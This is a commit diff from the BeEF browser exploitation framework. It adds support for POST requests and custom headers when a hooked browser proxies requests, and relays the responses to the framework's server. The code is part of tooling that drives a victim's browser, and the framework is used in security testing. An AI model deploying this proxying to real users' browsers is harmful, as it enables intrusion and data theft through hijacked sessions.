(Fixes issue 486): now using the requester (so also the tunneling proxy) you can correctly send POST requests

2011-11-23 17:07:55 +01:00
parent a087a702f0
commit c37db1e364
3 changed files with 19 additions and 7 deletions
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -214,8 +214,7 @@ beef.net = {
     *                        they will always throw error for SoP. This can happen when tunneling a browser: for example
     *                        Firefox and Chrome automatically requests /safebrowsing/downloads (XHR)
     */
-    proxyrequest: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, requestid, callback) {
-
+    proxyrequest: function(scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, requestid, callback) {
        //check if same domain or cross domain
 		var cross_domain = true;
        if (document.domain == domain){
@@ -250,13 +249,27 @@ beef.net = {

        var start_time = new Date().getTime();

+        if(method == "POST"){
+          $j.ajaxSetup({
+              data: data
+          });
+        }
+
        //build and execute the request
        $j.ajax({type: method,
            dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
            url: url,
-            data: data,
+            headers: headers,
            timeout: (timeout * 1000),

+            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            beforeSend: function(xhr) {
+                if(method == "POST"){
+                   xhr.setRequestHeader("Content-type",
+                                 "application/x-www-form-urlencoded; charset=utf-8");
+                }
+            },
+
            success: function(data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -31,12 +31,12 @@ beef.net.requester = {
        for (i in requests_array) {
            request = requests_array[i];
            beef.net.proxyrequest('http', request.method, request.host, request.port,
-                                    request.uri, null, null, 10, null, request.id,
+                                    request.uri, null, request.headers, request.data, 10, null, request.id,
                                       function(res, requestid) { beef.net.send('/requester', requestid, {
                                           response_data:res.response_body,
                                           response_status_code: res.status_code,
                                           response_status_text: res.status_text,
-					   response_port_status: res.port_status,
+					                       response_port_status: res.port_status,
                                           response_headers: res.headers});
                                       }
                                 );
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -73,7 +73,7 @@ module BeEF
                 @port = req_parts[index].split(/: /)[1].split(/:/)[1]
              end

-              if value.eql?("")# this will be \r\n, like post-data
+              if value.eql?("") or value.strip.empty?# this will be the CRLF (before HTTP request body)
                @post_data_index = index
              end
            end
@@ -102,7 +102,6 @@ module BeEF
                 @port = 80
              end
            end
-            print_debug "Uri [#{uri}] - Host: [#{@host}] - Port [#{@port}]"

            #POST request
            if not @content_length.nil? and @content_length > 0